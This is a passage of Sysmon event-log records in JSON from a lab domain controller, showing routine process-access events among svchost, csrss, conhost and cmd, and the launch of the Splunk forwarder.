05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1636,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1637,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1638,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010A1610300}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010A1610300}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1639,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.734\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010A1610300}\r\nSourceProcessId: 3716\r\nSourceThreadId: 3736\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-001042600300}\r\nTargetProcessId: 3708\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.734","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010A1610300}","SourceProcessId":"3716","SourceThreadId":"3736","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-001042600300}","TargetProcessId":"3708","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1640,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-0010C1630300}\r\nProcessId: 3752\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-01C6-5F25-0000-001042600300}\r\nParentProcessId: 3708\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","ProcessGuid":"{A837DB8D-01C6-5F25-0000-0010C1630300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-01C6-5F25-0000-001042600300}","ParentProcessId":"3708","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1641,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-001042600300}\r\nSourceProcessId: 3708\r\nSourceThreadId: 3712\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010C1630300}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-001042600300}","SourceProcessId":"3708","SourceThreadId":"3712","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010C1630300}","TargetProcessId":"3752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1642,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010C1630300}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010C1630300}","TargetProcessId":"3752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1643,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1644,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
